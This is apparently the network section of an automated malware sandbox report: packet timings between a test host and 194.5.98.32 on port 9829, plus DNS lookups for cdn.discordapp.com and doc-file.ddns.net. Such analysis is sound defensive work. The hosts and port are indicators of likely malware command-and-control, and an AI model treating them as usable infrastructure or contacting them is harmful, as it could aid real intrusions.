                                                                                                Oct 26, 2021 17:36:24.049036026 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.049803972 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.051918030 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.051975965 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.051980972 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.053468943 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.053504944 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.053553104 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.058582067 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.058650017 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.058722973 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.063460112 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.063507080 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.063529015 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.063627958 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.063677073 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.063767910 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.063894987 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.063956022 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.070511103 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.085694075 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.085869074 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.087821960 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.089876890 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.089982986 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.100337982 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.101275921 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.101502895 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.103581905 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.104967117 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105081081 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.105310917 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105468988 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105489016 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105509043 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105520010 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.105550051 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.105739117 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105757952 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105772972 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105801105 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.105835915 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.105873108 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.106054068 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106117964 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106133938 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106153011 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106159925 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.106205940 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.106210947 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106275082 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106292009 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106312037 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.106380939 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106421947 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.106565952 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106581926 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.106632948 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.759738922 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.760334015 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.760505915 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.769373894 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770524025 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770551920 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770643950 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770659924 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.770745039 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770761013 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770778894 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770795107 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.770814896 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.770828962 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.770859003 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.771265030 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.780965090 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781047106 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781070948 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781092882 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781117916 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781124115 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781136990 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781141996 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781187057 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781467915 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781492949 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781508923 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781524897 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781563997 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781613111 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781619072 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781718969 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781773090 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781793118 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781817913 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781883955 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781888962 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781924009 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781948090 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781969070 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.781971931 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.781992912 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782015085 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782094002 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782095909 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782116890 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782213926 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782226086 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782248020 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782269955 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782289982 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782320976 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782356977 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782426119 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782443047 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782529116 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782567978 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782574892 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782583952 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782601118 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782684088 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782768965 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782790899 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.782861948 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.782968998 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.784776926 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.784810066 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.785043955 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.785794973 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.785880089 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.787826061 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.788817883 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.788904905 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.789758921 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.790750027 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.791759968 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.791759014 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.792870998 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.793032885 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.802875042 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.802915096 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.802936077 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.802978992 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.803060055 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.803124905 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.807347059 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.807692051 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.807904005 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.807910919 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.807938099 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.808028936 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.808032036 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.814873934 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.814980984 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.823973894 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.826718092 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.826817989 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.828984022 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.830774069 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.830841064 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.832762003 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.835799932 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.835839987 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.835890055 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.837717056 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.837800026 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.846868992 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.846910954 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.846935987 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.846968889 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:24.846980095 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.847002029 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:24.847028971 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.034445047 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.187469006 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.195854902 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.196002007 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.196712017 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.196758032 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.196821928 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.196825981 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.196904898 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.196964979 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.197168112 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.197196007 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.197266102 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.197905064 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.198808908 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.198882103 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.207956076 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.216753960 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.216792107 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.216854095 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.216896057 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.216919899 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.217010975 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.217067957 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.217114925 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.217165947 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.217191935 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.217217922 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.217236042 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.217242002 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.217325926 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.221152067 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.232687950 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.232726097 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.232745886 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:25.232847929 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:25.232901096 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:26.145060062 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:26.415611029 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:26.706702948 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:27.285967112 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:27.286035061 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:27.297799110 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:27.784320116 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:27.787383080 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:28.431180000 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:28.431353092 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:29.026931047 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:29.027066946 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:29.280400038 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:29.282780886 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:29.578289032 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:31.975811958 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:32.330991030 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:32.418298960 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:32.418615103 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:32.418692112 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:34.157623053 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:34.222773075 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:39.227346897 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:39.332578897 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:39.583714962 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:39.655565023 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:44.275213957 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:44.333043098 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:45.215451956 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:45.215575933 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:48.286638021 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:48.333380938 CEST497729829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:49.801836967 CEST982949772194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:53.840761900 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:54.076056957 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:54.076172113 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:54.076442003 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:54.396256924 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:54.495790005 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:54.496015072 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:54.743494987 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:54.744179964 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:55.083692074 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:55.337354898 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:55.337918997 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:55.676649094 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:55.716731071 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:55.896403074 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:56.155702114 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:56.155927896 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:56.395692110 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:56.395873070 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:56.676582098 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:56.896744013 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:57.135673046 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:57.209117889 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:36:59.679101944 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:36:59.896814108 CEST497799829192.168.2.5194.5.98.32
                                                                                                Oct 26, 2021 17:37:00.323318005 CEST982949779194.5.98.32192.168.2.5
                                                                                                Oct 26, 2021 17:37:00.327393055 CEST497799829192.168.2.5194.5.98.32

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 26, 2021 17:34:18.360546112 CEST5479553192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:34:18.384594917 CEST53547958.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:09.618642092 CEST6173353192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:09.639238119 CEST53617338.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:10.395644903 CEST6544753192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:10.415817022 CEST53654478.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:12.816334963 CEST5244153192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:12.834665060 CEST53524418.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:15.869379997 CEST6217653192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:15.890234947 CEST53621768.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:17.562428951 CEST6529653192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:17.583018064 CEST53652968.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:27.450675964 CEST6015153192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:27.487956047 CEST53601518.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:35.487019062 CEST5696953192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:35.505229950 CEST53569698.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:44.630162001 CEST5516153192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:44.650439978 CEST53551618.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:35:53.610677004 CEST5475753192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:35:53.627926111 CEST53547578.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:36:00.832694054 CEST4999253192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:36:00.858899117 CEST53499928.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:36:18.106003046 CEST5501653192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:36:18.125802994 CEST53550168.8.8.8192.168.2.5
                                                                                                Oct 26, 2021 17:36:53.819464922 CEST5046353192.168.2.58.8.8.8
                                                                                                Oct 26, 2021 17:36:53.840279102 CEST53504638.8.8.8192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Oct 26, 2021 17:34:18.360546112 CEST192.168.2.58.8.8.80x1f56Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:09.618642092 CEST192.168.2.58.8.8.80x3f5dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:10.395644903 CEST192.168.2.58.8.8.80x254Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:12.816334963 CEST192.168.2.58.8.8.80xbb15Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:15.869379997 CEST192.168.2.58.8.8.80xcb80Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:17.562428951 CEST192.168.2.58.8.8.80x6c22Standard query (0)doc-file.ddns.netA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:27.450675964 CEST192.168.2.58.8.8.80x883bStandard query (0)doc-file.ddns.netA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:35.487019062 CEST192.168.2.58.8.8.80xb161Standard query (0)doc-file.ddns.netA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:44.630162001 CEST192.168.2.58.8.8.80xd986Standard query (0)doc-file.ddns.netA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:35:53.610677004 CEST192.168.2.58.8.8.80x59c7Standard query (0)doc-file.ddns.netA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:36:00.832694054 CEST192.168.2.58.8.8.80x20aeStandard query (0)doc-file.ddns.netA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:36:18.106003046 CEST192.168.2.58.8.8.80x522Standard query (0)doc-file.ddns.netA (IP address)IN (0x0001)
                                                                                                Oct 26, 2021 17:36:53.819464922 CEST192.168.2.58.8.8.80x1208Standard query (0)doc-file.ddns.netA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
